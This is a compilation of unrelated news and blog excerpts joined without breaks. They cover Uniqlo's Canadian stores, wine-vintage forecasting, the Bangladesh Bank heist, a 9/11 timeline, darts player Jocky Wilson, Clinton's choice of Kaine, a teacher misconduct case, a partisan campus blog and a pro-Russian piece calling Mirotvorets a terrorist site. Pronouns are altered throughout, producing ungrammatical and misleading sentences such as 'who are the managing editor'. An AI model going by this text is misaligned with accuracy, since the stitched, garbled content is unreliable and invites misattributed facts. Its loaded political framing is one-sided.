After many years of speculation and anticipation, Japanese fast fashion retailer Uniqlo will open its first Canadian location at CF Toronto Eaton Centre on Friday, September 30.
The two-storey, 27,400-square-foot store is located across the street from Yonge-Dundas Square, right next to the 220,000-square-foot flagship Nordstrom store which is slated to open on September 16.
Shortly after on October 30, Uniqlo's second Canadian location will open at Yorkdale Shopping Centre within the Nordstrom expansion wing. The store will have 25,500 square feet of space spread over two floors.
“We are very excited to launch UNIQLO in Canada and introduce our LifeWear – innovative, high-quality clothing that is universal in design and comfort and made for everyone, everywhere – as well as our exceptional value and customer service to Canadian customers,” said Yasuhiro Hayashi, Chief Operating Officer of UNIQLO Canada, in a statement.
“At UNIQLO, we constantly improve our products to be able to offer more warmth, more lightness and more comfort. Torontonians are known for celebrating individuality and continuous reinvention, and these qualities make Toronto the perfect place to open our first doors.”
The company is expected to open its third Canadian location in Vancouver in late-2016 or early-2017 at a former Home Outfitters space at Metropolis at Metrotown in Burnaby. A fourth location is geared for downtown Vancouver, possibly within a new purpose-built retail space at Pacific Centre mall.
Uniqlo directly competes with other multinational fast fashion companies such as H&M, Zara, and Topshop & Topman. It is best known for its simple, basic designs and use of higher-quality materials.
There are currently over 1,400 Uniqlo stores worldwide across 14 countries, but the company only recently began tapping into the North American market. It opened its first West Coast store in 2012 at San Francisco's Union Square and in November 2015 it opened a store in Bellevue, Washington State to serve the Seattle market.
Rendering of the exterior of Canada's first Uniqlo store at CF Toronto Eaton Centre.
When our houses or offices get piled with clutter, much of the reason is procrastination.
We all procrastinate — let's just get that out in the open. There's not a one of us who doesn't, to some degree.
But while our tasks and projects can pile up, giving us some anxiety, the clutter is a visual sign of that procrastination, and carries with it just as much anxiety.
When we put down an object, a piece of paper, an article of clothing, a stack of mail … and we leave it there, undealt with, saying that we'll put it away or deal with it later … that's procrastination.
Unfortunately, this piles up, accumulates over time, and then we're stuck with a mountain of clutter that's too overwhelming to deal with.
You'll need to deal with that mountain. I've shown you some methods. Get it down to minimal, and enjoy that.
But once you've dealt with the mountain, you need to stop it from happening again. That's where beating your procrastination habits becomes so important.
When you're going to put something down, deal with it right now. It only takes a few seconds.
How long does it take to put dirty clothes in the hamper, or hang up a shirt that's still clean? Like 15 seconds. How long does it take to sort through some mail, opening the envelopes right there, setting aside a few bills to be paid, filing a couple things, tossing the rest? Three minutes. How long does it take to put a book or magazine away? To put a piece of paper in the right file, or toss it? Seconds.
When you deal with things in tiny little bits like this, before they build up, it's easy. Deal with them while they're easy so you don't have to deal with them when they're hard.
Welsh singer Tom Jones has revealed that the late King of Rock and Roll, Elvis Presley, had once serenaded them in the shower while they were naked.
Jones, 70, who had been good friends with Presley until their death in 1977, revealed that latter was so eager to make them hear a song that they started crooning over the shower door.
"He came with a song one time that he'd heard and they felt it would be a good song for me, and so they couldn't wait for me to... I came off the stage and I said 'Elvis, hang on I've got to get in the shower'," the Sydney Morning Herald quoted Jones as saying.
"So, I'm in the shower and I hear them singing. I thought I was going mad but I looked up and they were leaning over the shower door singing this song to me," they added.
For the moment, though, Professor Ashenfelter is too distracted to ponder the cosmic implications of removing the human element and the romance from vintage rating. That is because their just-completed calculations suggest that the 1989 Bordeaux wines will be the greatest of the century.
Most wines are bottled soon after they are made and are ready to drink shortly thereafter. The small fraction of French red wines destined to be sipped and savored spend 18 to 24 months in oak casks and are then set aside for aging in bottles.
Tastes from the barrel heavily influence the prices of wine futures, sold the year after the harvest. Samples from the newly bottled wines help determine the wholesale price - rarely less than $10 a bottle - at which the wines are first shipped around the world.
Only years later can vintages be ranked by taste with any precision. And as most experts acknowledge, there is many a slip between barrel, bottle and lip.
In 1967 Andre Simon, the prominent wine writer, predicted that the 1965 Bordeaux would be as good as the promising 1961 vintage. Today, few of the weak, acidic 1965's are available. One that is, Chateau Lafite-Rothschild, sells at auction for just one-fifteenth the price of the truly great 1961 wines from the same vineyards.
Mr. Ashenfelter, a 47-year-old specialist in labor economics who are the managing editor of The American Economic Review, is convinced they have found a better way.
It is widely agreed that weather influences wine quality. What few understand, they argue, is that a mere handful of facts about the local weather tell almost all there is to know about a vintage. And using the same techniques employed to forecast, say, the effect of a change in wage rates on employment in the auto industry, they have gone a long way toward proving their audacious theory.
Advertisement Continue reading the main story
It's Laptop vs. Nose
Weather-based vintage prediction is not a new idea. What is new is the notion that laptop computers can outperform the most sophisticated noses and palates.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
The critical concept, Professor Ashenfelter acknowledges, came from Bruno Prats, owner of Chateau Cos d'Estournel in the St.-Estephe region of Bordeaux. Mr. Prats charted both the average temperature during the growing season and rainfall during the harvest months to make systematic comparisons between vintages.
Professor Ashenfelter added data for winter rainfall and then rigorously measured their statistical relationships to the most objective measure of quality they could devise: an index of auction prices for about 80 wines after they have matured in the bottle.
According to this ''multivariate regression analysis,'' heavy rains in the winter followed by a hot summer improve wine quality, while rainfall before the harvest damages it. The statistical fit from 1952 through 1980 is remarkably snug for the red wines of Burgundy as well as Bordeaux.
Year-to-Year Variations
Michael Broadbent, director of wines at Christie's auction house in London and a leading authority on Bordeaux, points out that the system cannot predict quality differences between estate-bottled wines of the same vintage. And it may yield systematic errors by lumping together wines primarily based on the cabernet sauvignon grape with the minority based on the softer-tasting merlot grape, which matures earlier.
But as Steve Ross, a wine enthusiast who is a professor of finance at the Yale School of Management, points out, the simple statistical model does explain basic year-to-year variations without major slips. ''If you did not tell them a machine did it,'' Mr. Ross said, ''I think it would pass muster with the wise heads in the business.''
Interest in the system has mostly been confined to the small group of wine buffs who are comfortable with econometric techniques. Circulation of Mr. Ashenfelter's semiannual newsletter, ''Liquid Assets'' ($30 for a yearly subscription), numbers about 600 - a tiny fraction of the readership of The Wine Advocate ($30, with a circulation of more than 27,000), which Mr. Parker publishes from their home in Maryland. But that could change if two of the Princeton economist's predictions prove accurate.
For most young Bordeaux vintages, the Ashenfelter forecasts are within hailing distance of the tasters' conventional wisdom. For the 1986 vintage, however, they are poles apart.
'Sometimes Exceptional'
Mr. Parker rates the 1986's as ''very good and sometimes exceptional.'' Peter A. Sichel, author of the influential Bordeaux Vintage and Market Report, said the 1986's have ''elegance and classic Bordeaux structure.'' New York stores, brimming with the vintage, are pricing the wines in the same range as the much-praised 1985's.
Advertisement Continue reading the main story
But according to the Ashenfelter system, below-average growing season temperatures and above-average harvest rainfall doom the 1986 Bordeaux to mediocrity. When the dust settles, they predict, it will be judged the worst vintage of the 1980's, and no better than the unmemorable 1974's or 1969's.
Perhaps the most dramatic Ashenfelter prediction, the one likely to vault the ratings system into prominence or doom it to obscurity, is for the 1989 vintage.
These wines are barely three months in the cask and have yet to be tasted by critics. By Professor Ashenfelter's calculations, the hottest growing season in memory, combined with a very dry harvest, all but guarantee that the 1989 Bordeaux will be stunningly good. Adjusted for age, they predict, these wines will eventually sell for a substantial premium over the great 1961 vintage.
For the moment, though, the wine industry's assessment of the champion of vintage rating by the numbers is hardly flattering. To paraphrase James Thurber, they are most definitely not amused by their presumption.
By Stefan Marjoram: A ridiculously exciting day yesterday! I've been sketching and photographing the rebuild of the 300 h.p. FIAT S76 land speed record car for a few years now. Yesterday, over 100 years since it had last run, The Beast of Turin was brought back to life again. A misbehaving coil caused a lot of head scratching in the morning, and it was a good twenty or so attempts before the best settings for the timing and mixture were found.
But when the engine finally burst into life the noise was spectacular – as were the flames (despite running a bit lean). The first burst from the 28-litre (1729 c.i.) engine shook the whole car, but it soon calmed down and ran smoothly – without losing any oil and without any worrying noises. Duncan, Bruce and Tucker's patience and attention to detail and hard work has paid off. The next task will be to find a wide open space in which to try driving it.
Editors Note: A BIG CONGRATULATIONS to Duncan Pittaway and Company, all of Southwestern England for accomplishing this long-term project. We have been following Duncan's progress on it since May of 2011 thanks to Stefan Marjoram of Lower Langford, North Somerset, England. You can look back here at all of our coverage and Stefan's earlier artwork and photography of the Fiat S76 on The Old Motor.
Below you can see and hear the start-up of the Fiat yesterday in the trailer by Stefan Marjoram for The Beast of Turin, a film that is upcoming in February of 2015.
The $81 million was initially wired to the Philippines, going into 4 Rizal Commercial Banking Corporation (RCBC) foreign currency accounts in its Jupiter, Makati branch.
The stolen money was then consolidated into two foreign currency accounts linked to Filipino-Chinese business person William Go, and then moved to Midas Hotel and Casino, City of Dreams, and Solaire Resort and Casino.
The Bureau of Immigration on Friday, March 12, barred Maia Santos-Deguito – manager of RCBC Jupiter – from leaving the Philippines.
Meanwhile, Go, who used to own S&R Membership Shopping, has denied in an affidavit to the National Bureau of Investigation that they opened the RCBC account. Their supposed foreign currency accounts – one in their name and another in the name of their business Centurytex Trading – were allegedly used to hold the bulk of the laundered money.
Go's lawyer, Ramon Esguerra, told reporters on Friday, March 12, that Deguito met up with Go, offering up to P20 million ($430,000) to cover up the transactions by closing the accounts. (READ: Ex-S&R owner to sue RCBC manager over heist)
The Philippine Senate on Tuesday, March 15, is set to hold a hearing on the money-laundering case.
Key resource people include members of the Anti-Money Laundering Council (AMLC) led by its chair, Bangko Sentral ng Pilipinas Governor Chair Amando Tetangco Jr; RCBC president and CEO Lorenzo Tan; Philippine Amusement and Gaming Corporation chair and CEO Cristino Naguiat Jr; and officials of Solaire Resort and Casino, Midas Hotel and Casino, and City of Dreams.
Ease of fund transfer to PH
The Philippines' involvement in the $100-million Bangladesh Bank heist, which has risked its return to the FATF gray list, showed the urgency of putting more teeth into the Anti-Money Laundering Act (AMLA), said Securities and Exchange Commission chairperson Teresita Herbosa, who co-chairs AMLC.
The law, which was first introduced in 2001, left casinos out of the list of entities required to report suspicious transactions to the AMLC. There were efforts in the Senate to include this provision in the amended AMLA in 2013, but this was blocked by some lawmakers, and PAGCOR. (READ: Casinos exempt from tougher anti-money laundering law)
At the time, the country was at risk of being blacklisted by FATF without an amended AMLA by the deadline set by the body.
Herbosa said not requiring casinos to report suspicious transactions might have allowed the easy entry of dirty money into local casinos – just like what supposedly happened in the case of the Bangladesh Bank funds.
"It's a global effort to eradicate money laundering. We have to catch up with people doing that activity and while we are doing that we need to strengthen the laws of each country to comfort to best practices,” Herbosa said.
For Senator Sergio Osmeña III, AMLA author, the casinos were excluded from the scope of the law due to strong lobbying of companies.
Osmeña said it is now up to the next Congress to pass the needed amendment. They added that Aquino's successor "should strongly reconsider the bank secrecy law."
"We have the strictest bank secrecy law in the whole world. Congress doesn't want to loosen it up. Why? You and I have our own guesses. It's very easy for criminals to hide their money in the Philippines. As a matter of fact, we are one of the most active money laundering centers in the world," Osmeña told ANC's News Now.
Another loophole is that AMLC can only look into an account once the concerned party is informed, also known as a de parte inquiry, Senator Teofisto Guingona III had earlier raised.
"As a result, once informed, many have resorted to emptying out their bank accounts before the government can inquire into them. Logic and necessity demand that we allow for an ex parte inquiry," Guingona earlier said in a blog post.
According to the Guingona, AMLC should be allowed to look into accounts of people – even without their presence – when there is probable case of money laundering or any unlawful activity.
OFWs the biggest loser if PH blacklisted
If the Philippines returns to the FATF gray list, lawmakers have said that overseas Filipino workers and their families will be the hardest hit. This is because FATF member-countries will implement the enhanced verification of money going in and out of the Philippines if this happens.
When the AMLA amendments were still being deliberated in Congress in 2012, Guingona told Rappler: "They'll make it harder because the presumption now is you have to prove that your money is legal. You're blacklisted so prove your money is really legitimate and not sourced from an illegal source. It's the reverse," (READ: Senate caucuses on AMLA; blacklisting feared)
For Osmeña, who chairs the Senate committee on banks, financial institutions and currencies, the Philippines will be at the losing end because local banks won't be able to transact with their counterparts in FATF countries.
Aside from OFWs, Guingona had said a blacklist will also affect business because companies will have difficulty sending money to the Philippines.
FATF has over 30 member-countries representing major financial centers like the US, UK, Germany, France, China, Japan, and South Korea.
This latest money laundering scandal draws attention to an outdated law, making it easy for criminals to hide dirty money in the Philippines and hard for the authorities to investigate such cases.
With the Senate hearing set on Tuesday, March 15, authorities will hopefully discuss how they can plug loopholes in the outdated AMLA. – Rappler.com
A large number of entries have been added to the Complete 9/11 Timeline at History Commons, including many that provide new details about the events of September 11, 2001, and some that describe the initial official accounts of the military's response to the 9/11 attacks.
Air Force Secretary and Chief and Chief of Staff Learned of Attacks during Meetings
Several new timeline entries detail the actions of James Roche, the secretary of the Air Force, and John Jumper, the Air Force chief of staff, on September 11. Roche was alerted to the first plane crash at the World Trade Center during a meeting with several members of congress in their office at the Pentagon, in which the subject of Islamic fundamentalism was being discussed. Jumper, meanwhile, learned about the crashes at the WTC during a routine staff meeting, but they continued the meeting instead of responding right away.
After Jumper headed upstairs to Roche's office, the two men were escorted to the Air Force Operations Center in the basement of the Pentagon shortly after the building was attacked, at 9:37 a.m. When they arrived at the Operations Center, they started assisting the Air Force's response to the attacks.
A couple of entries relate to the Army's Office of the Deputy Chief of Staff for Personnel (ODCSPER) at the Pentagon. A dozen ODCSPER officials went ahead with a 9:00 a.m. meeting, unaware of the first crash at the WTC, which occurred at 8:46 a.m., and they were not alerted by their colleagues when the second crash occurred at 9:03 a.m. Ironically, Timothy Maude, who ran the ODCSPER, was originally scheduled to attend a meeting at 9:45 a.m. to discuss what to do if a disaster should hit the Pentagon.
Crisis Actions Teams Were Activated
A number of new timeline entries describe the actions of various “crisis action teams” in response to the 9/11 attacks.
The Joint Chiefs of Staff activated its Crisis Actions Team (CAT) at the Pentagon sometime after the first hijacked plane crashed into the WTC. The Air Force's CAT was reportedly activated at around 9:00 a.m. However, the Operations Center at the Pentagon where it worked from had to be evacuated later on and at 1:00 p.m. a replacement facility was established at Bolling Air Force Base. The Air National Guard's CAT was activated shortly after the Pentagon was attacked and carried out its operations at Andrews Air Force Base, just outside Washington, DC.
The Army's CAT at the Pentagon was activated after the second hijacked plane crashed into the WTC. It was reportedly “formally stood up” at 9:43 a.m. and its members then responded to the terrorist attacks. Major General Peter Chiarelli, who gave the order to activate it, was informed, shortly before the Pentagon was attacked, that a hijacked aircraft was heading toward Washington and was possibly aiming for the Pentagon.
Crew of Airborne Operations Center Thought Attacks Were Part of an Exercise
A timeline entry describes how crew members on an E-4B National Airborne Operations Center plane at Andrews Air Force Base initially thought the terrorist attacks were part of a training exercise when they were alerted to them. Their plane took off at around 9:27 a.m. and then flew to a base in Nebraska. Another E-4B took off from Andrews at around 9:45 a.m.
Meanwhile, the North American Aerospace Defense Command (NORAD) representative on the Pentagon's air threat conference call reported, shortly after the Pentagon was attacked, that Ralph Eberhart, the commander of NORAD, had not yet declared the situation that morning an air defense emergency.
A couple of timeline entries relate to problems experienced by the plane carrying Henry Shelton, the chairperson of the Joint Chiefs of Staff, that day. After Shelton learned of the attacks, their plane had to spend hours flying in “holding patterns” near Greenland and then over Canada before it was cleared to fly back into the US. It therefore only landed at Andrews Air Force Base at 4:40 p.m.
Accounts of the Government's Response to the Attacks Were Put Forward in the Week after 9/11
A number of new timeline entries describe the initial accounts that officials provided, in the weeks after September 11, of the government's response to the 9/11 attacks.
On September 13, Richard Myers, the acting chairperson of the Joint Chiefs of Staff during the 9/11 attacks, was questioned about the military's response to the attacks by the Senate Armed Services Committee, but their answers were vague and confused. The next day, Paul Weaver, director of the Air National Guard, provided reporters with a more detailed account in an “impromptu hallway interview” at the Pentagon.
On September 17, the Federal Aviation Administration produced a chronology of the events of September 11, which it used when it briefed the White House that day. The following day, NORAD released a timeline of its response to the 9/11 attacks, but the accuracy of this account has been challenged by the 9/11 Commission.
Ralph Eberhart outlined NORAD's version of the events of September 11 during an appearance before the Senate Armed Services Committee on October 25, but the 9/11 Commission found that some of the information they provided that day was incorrect.
A couple of new timeline entries describe miscellaneous 9/11-related events. In 1999, alleged 9/11 hijacker Mohamed Atta tried to sell antiquities from Afghanistan in order to pay for flying lessons. And a report published one week after 9/11 stated that investigators had detected a signal from one of the “black boxes” from the planes that crashed into the WTC, although government officials have claimed that no black boxes were ever recovered at Ground Zero.
Please consider donating to History Commons, to help it continue as a leading informational source for the 21st century. To make a donation, click here.
Advertisements
Thirty years after becoming world champion Jocky Wilson is an ailing recluse in a Fife council house, a world away from the glory of 1982
HERE we are in January of 1982 and this is the news. Margaret Thatcher's son, Mark, has disappeared in the Sahara during the Paris-Dakar Rally. The Commodore 64 home computer has been launched. It's -27 in Braemar. Air Florida Flight 90 has crashed into the 14th Street Bridge in Washington and fallen into the Potomac River. The government in Ireland has collapsed. The government in Westminster is in freefall. Unemployment has risen by 129,918. There are more than three million Brits on the dole.
And now you join us in the oasis that is the Jollees Cabaret Club in Stoke. No doom and gloom here. Just a packed audience and plenty of booze for the 1982 BDO World Darts Championship final. Here's Sid Waddell, calling the finalists as only they can. From England, John Lowe: “Striding out like Alexander The Great conquering the Persians!” And from Scotland, Jocky Wilson: “The lad has the psychology of a claymore!”
Waddell is giving it large, their voice just about heard above the noisy masses. “Jocky Wilson versus John Lowe makes King Kong versus Godzilla look like a chimpanzees' tea-party!” Lowe has prepared for this world final just like they prepared for the three others that went before, the loss to Leighton Rees which they avenged a year later, then the defeat to that crafty sod Eric Bristow in '81. Lowe is certain of two things standing there on the oche. “Number one: Jocky is the best player on the planet right now. And number two: Not tonight, he's not.”
Jocky's been on their boat. Fishing. Drinking. Smoking. Pint of vodka and coke. Cartons of Embassy fags. “Nae bother.” They play their countryman, Rab Smith, in the first round and does them 2-0. Swears later that he's getting through 200 cigarettes a day. Plays Alan Evans of Wales in round two and beats them 2-1. Sweet, that. Evans doesn't like Jocky much and the feeling's mutual. “When I beat Evans, they told me ‘I'd love to knock your flippin' head off','' Jocky said. Only it wasn't flippin', it was something more aggressive, which made it altogether more satisfying when Jocky put them away.
It was the only set Jocky lost on their way to that final. In the quarter-final they dismantled David Miller 4-0. In the semi they did the same to Stefan Lord. They were on a nine-dart finish at one stage of that match; 180, 180, then they light a fag, takes a drag, fires their 23-gram arrow into the treble 20 and... well, they never got the nine-darter (he checked out in ten) or the 32 grand that would have come with it, but Lord was blown away nonetheless. “Jocky's going like the Loch Ness monster with a following wind,” reported Sid.
So now there's just two left standing. And they're away. Best of nine sets. Best of order, please. Jocky to throw first.
That was then, this is now. This week marks the 30th anniversary of Jocky's first world title and the pinnacle of their fame to that point. Lowe is talking about it now. He's about to get on a flight to Denmark to play some darts. Then he's off to Lanzarote for some sun. They do the things that Jocky can't. They play, they travel and they talk.
“That '82 final? Oh God, yeah. Jocky at their best, that was. Best in the world at the time, no mistake. Bristow was out first round that year. Thought I had it when Eric fell. Thought I'd beat Jocky, but maybe I was tricking myself. Are you talking to Jocky? Oh, you won't be, will you. No. Jocky don't talk.”
In search of Jocky Wilson. It's been tried so many times now that every time the door goes in the little council house they live in with their wife, Malvina, the chances are that it will be a journalist wanting a word. Last year it was a film-maker. From Germany, exiled in Scotland. Julian Schwanitz's Kirkcaldy Man premieres in Glasgow next month. It is a beautiful short film about a man and their community. Came from nothing, went back to nothing.
Malvina features, giving the same polite answers they always give. No, Jocky won't come out to talk. They cannae. It's their lungs and that. They can hardly walk up the stair. Even if they could chat, he's no interested. The titles, the world travel, the booze and the fags and the fallouts, the taxman, the money won and lost, the fall from grace, the years as a recluse.
One interview in 16 years. One. Conducted on the top step outside their house through a half-closed door. It's in the past. Just leave it, son. Have they any chance of getting better? Nae chance. He'll never beat this. He'll never speak and he'll never be better.
You talk to people in Kirkcaldy. People who knew him, people who played against him, people who drank with him, people they fell out with. Nobody's heard a peep in a decade and more.
“He's still in the house,” says one. “Naw, he's in a care home, so I heard.”
“He's back in hospital.”
“He was in the pub the other night playing darts for pints.”
“He's dead.”
He's dead. That was the chat not so long ago. A bloke walks into a pub and says that Jocky's gone. “Bollocks,” says the pub. “If something like that happened, we'd hear about it.” But would they?
Allan Crow is editor of the Fife Free Press. “We picked our top 100 sporting Fifers in the paper. Jim Baxter was first, Jim Clark was second. Jocky was in the top five. Double world champion. We thought that might bring them out of the house, maybe get them to say a few words to us, but there was no response.” No response either when Bristow knocked on their door a few years back. The only words Jocky has uttered in public in all these years were a few sentences they recorded for the inaugural Jocky Wilson Cup in the summer of 2009. Apparently, it took them two days to find the strength to do it.
“Thirty years since that final, eh?” says Lowe. “Well, I remember it well. And I remember Jocky well. We used to get on like a house on fire, us two. I haven't seen since them since 1994. Sad, that. Just to show you what good pals we were, they come up to me one day and says, ‘I need your picture'. I say, ‘Right, there you are'. They say, ‘I need you to sign it'. ‘OK, Jocky. Done'. ‘Who's this for, then?' I say. ‘Me dad', they say. ‘He thinks you're great. They want a signed picture for the top of the telly. Every time I go in their house now I'm gonna have to look at your ugly mug'.
“We are coming home from an exhibition in Australia, myself, Jocky and Cliff Lazarenko. So I buy a round in the airport before we head off, then Cliff buys a round, then Jocky wants to buy a round but we have to get on the plane, so they says ‘I'll get the first one wherever we're heading next'. It was Kuala Lumpur. Jocky goes up and says we'll be having three pints of lager. No pints, says the boy. Just tins, sir. Right, give us six tins, says Jocky. Twenty five quid it cost him. They went mental. It was the funniest thing ever. They nearly didn't drink 'em.”
They were pals by '82. And rivals. Jocky had never been past the quarter-finals of the world championship before, but in their heart of hearts Lowe knew this was a different Jocky, a completely new animal. “You'd stand behind them and they had that snatchy action. He'd jerk the dart out of their hand. If any other player did that you'd think there's no way that dart is going where it needs to go, but Jocky made it work. They found their way into the treble 20 in their own style.
“He beat me 5-3. Double 16 for the title and they did it first time. Ah, I was happy for him, but I was worried for them a little bit at the same time. Jocky had a terrible insecurity. He'd always walk in a room and say, ‘Am I doing OK, John? Am I all right?' I'd say, ‘Of course you're all right, Jocky.' Then he'd hear some laughing across the other side of the room and he'd assume that the people were laughing at him. They had a dark side but I think it came from an insecurity. They were a loveable rogue, not ready for the success they got. They were on self-destruct. All the drink in the world but it was the fags that did him.
“I'd like to talk to them again, but I know that might never happen. And that's tragic, that. I'd like to sit down with him, but I can't see it. Now you're telling me here that there's no landmark to Jocky in Kirkcaldy and I can't understand that. I really can't. There should be a tribute. Maybe Jocky doesn't want one, but there should be. Maybe they want to forget but nobody else is going to forget, I can tell you that for nothing. There isn't a week goes by without somebody asking me, ‘How's yer mate, Jocky?' Nobody will ever forget Jocky Wilson. I hope they read this. If they do, I want to say this: Look after yourself mate. Regards to the family... John.”
Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesperson: Clinton staff are 'biggest a--holes in American politics' MORE has chosen Sen. Tim Kaine Timothy (Tim) Michael KaineTrump claims Democrats ‘don't mind executing babies after birth' after blocked abortion bill Democrats block abortion bill in Senate Trump unleashing digital juggernaut ahead of 2020 MORE (D-Va.) to be their running mate.
The announcement, made to supporters via text message and Twitter Friday evening, came after an exhaustive weeks-long vetting process by Clinton and several of their top advisers. Kaine is expected to campaign alongside Clinton in Miami on Saturday afternoon.
ADVERTISEMENT
Clinton called Kaine Friday evening to ask them to be their running mate, a source said. Kaine — who had spent the day at a couple of fundraisers in Massachusetts and Rhode Island — immediately accepted. They also called the finalists on their shortlist. Clinton also phoned President Obama to inform them of the decision, sources say.
"Tim is a lifelong fighter for progressive causes and one of the most qualified vice presidential candidates in our nation's history," Clinton said in an email to supporters on Friday evening. "He's a man of relentless optimism who believes no problem is unsolvable if you're willing to put in the work."
Kaine, a former Democratic National Committee chairperson, was long considered a top contender on Clinton's VP shortlist and appeared on the campaign trail with them in their home state last week. The governor-turned-senator was a favorite among Clinton's innermost circle — including Bill Clinton — who told advisers in recent days that they supported the pick. They also got strong support from Virginia Gov. Terry McAuliffe and top Clinton advisers, sources say.
The selection process began after the New York primary in April. Podesta visited Clinton's home in Chappaqua, N.Y., and brought their binders with info on more than two dozen candidates, the senior campaign aide said, adding that the mission was so covert, they handed the binders to Clinton in a Duane Reade shopping bag.
Clinton insiders say Kaine was selected foremost because they have the qualifications necessary for the job, particularly when it comes to national security experience. Clinton wanted someone with a thick national security portfolio, and Kaine holds seats on the Senate Armed Services and Senate Foreign Relations committees.
"Sen. Kaine was one of the first public officials to announce a public endorsement of Sen. Obama," Earnest said at the briefing. "Sen. Kaine served as the chair of the DNC during President Obama's first year in office and Sen. Kaine is somebody that the president deeply respects."
But some worry that their stance on abortion and past support of restrictions, like a late-term abortion ban, could hurt the Democratic ticket among some of the party's base.
Clinton's decision comes just days before the Democratic National Convention kicks off in Philadelphia, where they will be officially nominated.
A MIDDLE school teacher in the United States has admitted they gave one of their students a lap dance in front of the rest of their class.
Felicia Smith, 42, has been charged with engaging in an inappropriate relationship with a student, KHOU News reports.
According to a male student at the school in Houston, Texas, Ms Smith grabbed their journal and stopped them from talking to their friends as they walked into class. When the bell rang, Ms Smith placed a chair at the front of the room, and the boy's classmates told them to sit on it.
Music started to play. Then Ms Smith gave the student a “full contact lap dance”, grinding against them and rubbing their hands all over their body. The teacher also got on their knees and placed their head between their legs, KHOU reports.
The boy says they “slapped Ms Smith on the buttocks” several times.
At the end of the dance, which apparently lasted about four minutes, Ms Smith hugged the student and said “I love you baby, happy birthday.”
When they were questioned by police, the teacher admitted to performing the lap dance, saying they did it at the urging of their classmates.
Investigators have reviewed video footage of the incident, which is being kept on file at the District Attorney's office.
Another “quick takes” on items where there is too little to say to make a complete article, but is still important enough to comment on.
The focus this time: You can trust US, comrade!
First, a little bit of mood music:
Carrying on…
On college campuses, men are guilty, even if their purported victims claim otherwise:
“A former football player was ‘railroaded' by a ‘rogue' Title IX office at the University of Southern California, according to a surprising source — their alleged ‘victim.' “Zoe Katz, the captain of USC's women's tennis team, is accusing the university of not only ignoring their protestations that their boyfriend Matt Boermeester didn't assault her, but threatening them for speaking up.”
Further, Miss Katz noted the pressure on them to lie:
“‘I was told that I must be afraid of Matt, which I definitely was not and am not,” Katz wrote in their statement denouncing USC. ‘When I told the truth about Matt, in repeated interrogations, I was stereotyped and was told I must be a “battered” woman, and that made me feel demeaned and absurdly profiled.' “Instead they fears ‘further' retaliation from USC's Title IX office, which they say isolated them by prohibiting them from speaking with Boermeester and even their own friends”
Real violence by real rapists, on the other hand, is protected by campuses as seen by their willingness to disarm the prey in order to make the prey ever more tempting…
“Three years ago, Shayna Lopez-Rivas was sexually assaulted on Florida State University's campus. Today she's advocating for campuses to allow permitted students to carry guns on campus, so they can protect themselves from an assault like the one they went through. “‘He had a knife, I had pepper spray,' Lopez-Rivas told News 4 JAX. ‘And even though I ran for blue lights that are scattered all around, [he was] faster, stronger, and I did not win. . . The way that I carry [my gun] now, I would have been able to prevent what happened to me.'”
But in the end, they don't care just as long as the enemies are educated that it really is all their fault…
“Antifa-supporting students from Clemson University recently expressed their political sentiments by openly mocking the Victims of Communism Memorial on social media. “‘Victims of Communism Memorial (2017),' and ‘#NewProfilePic,' Clemson Students for a Democratic Society (SDS) President Dawn Lifsey captioned a photo, via Facebook and Twitter respectively, waving an Antifa flag in front of the memorial. “… “Responding to the photo on both platforms, Lifsey wrote, ‘This is the victims of communism memorial btw lmao,' explaining that the Antifa flag was borrowed, “from folks who were at the Juggalo March for this hilarious purpose.' “… “According to the Victims of Communism (VOC) website, the memorial ‘was authorized by a unanimous act of Congress, which was signed by President Bill Clinton on December 17, 1993.' The memorial is privately funded, and was dedicated by President George W. Bush in June of 2007. “‘From the famines, purges, and gulags of Soviet Russia to Mao's Great Leap Forward and the Killing Fields of the Khmer Rouge—from the 1989 Tiananmen Square Massacre to the Castro regime's 2012 murder of Oswaldo Payá—communists have killed more than 100 million people,' the VOC proclaims.”
Aren't you proud, comrade?
TTFN.
Tweet
Translated by Ollie Richardson
19:55:45
01/05/2017
The terrorist website “Mirotvorets“ threatened to record everyone who comes to Kulikovo field in Odessa to honor the memory of those who died in the Trade Unions Building in 2014. This was stated in a message on the official Facebook page of the website.
“Tomorrow, on May 2nd in Odessa, together with the developer we plan to hold testing of the possibilities of the mug-recogniser ‘SEPARATOR', which is scheduled to be put into operation this year … Incidentally, for the successful carrying out of testing, the Mirotvorets Center is interested in the fact that on May 2nd, 2017, there is a little gathering of the vatnik-headed community on Kulikovo field in Odessa,” it is said in the message.
The other day the adviser to the Minister of Internal Affairs of Ukraine Shkiryak appealed to residents of the country to refuse St. George's Ribbons during May memorials. In addition, Kharkov police promised to arrest all those who will appear in public places with St. George's Ribbons.
The terrorist site “Mirotvorets” continues to fill up its “black list”. The other day the Russian singer Dima Bilan found themselves on the database. Earlier the Russian participant of “Eurovision” Yulia Samoylova was added to the database of the site “Mirotvorets”. Later, Valery Leontiev and Sergey Shnurov also found themselves on the database of the website “Mirotvorets”. Mikhail Shufutinsky and Steven Seagal were also placed on the “black list” of the terrorist site.
The purpose of the creation of the website “Mirotvorets” is specified on the main page: the website's administrators collect and publish information “about pro-Russian terrorists, separatists, mercenaries, war criminals and murderers”. In the description of the site it is noted that it is a public initiative, however the website has a direct relationship with Gerashchenko, the adviser to the Interior Minister of Ukraine, which testifies to the origin of the site. In 2015, in Kiev, two prominent figures in just a few days were killed after their personal information was published on the site “Mirotvorets”. One of the killed was the oppositionist journalist Oles Buzina. After their murder their profile was removed. The second killed was Oleg Kalashnikov, the former People's Deputy of Ukraine from the Party of Regions. They were shot near their apartment in Kiev.
It should be noted that the international community ignores the existence of the terrorist website to this very day.
(CNN) Flint has been mired in a devastating water crisis for nearly three years, and it may be another two before it's resolved.
Mayor Karen Weaver wrote to EPA officials earlier this week to inform them that the Michigan city will not be able to treat its own water for lead and other contaminants until 2019, citing a lengthy construction and testing process for a new water treatment plant.
"To expedite completion of the project and minimize cost, a design/build project delivery method is proposed," Weaver wrote. "Based on this approach, an August, 2019, completion date is anticipated for the treatment plant improvements."
